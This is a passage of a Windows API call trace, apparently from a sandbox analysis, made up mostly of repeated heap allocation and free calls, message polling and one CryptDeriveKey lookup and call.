hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.002] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.002] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.003] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.003] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.003] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.004] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.004] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa188, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.007] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.008] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.014] RtlAllocateHeap 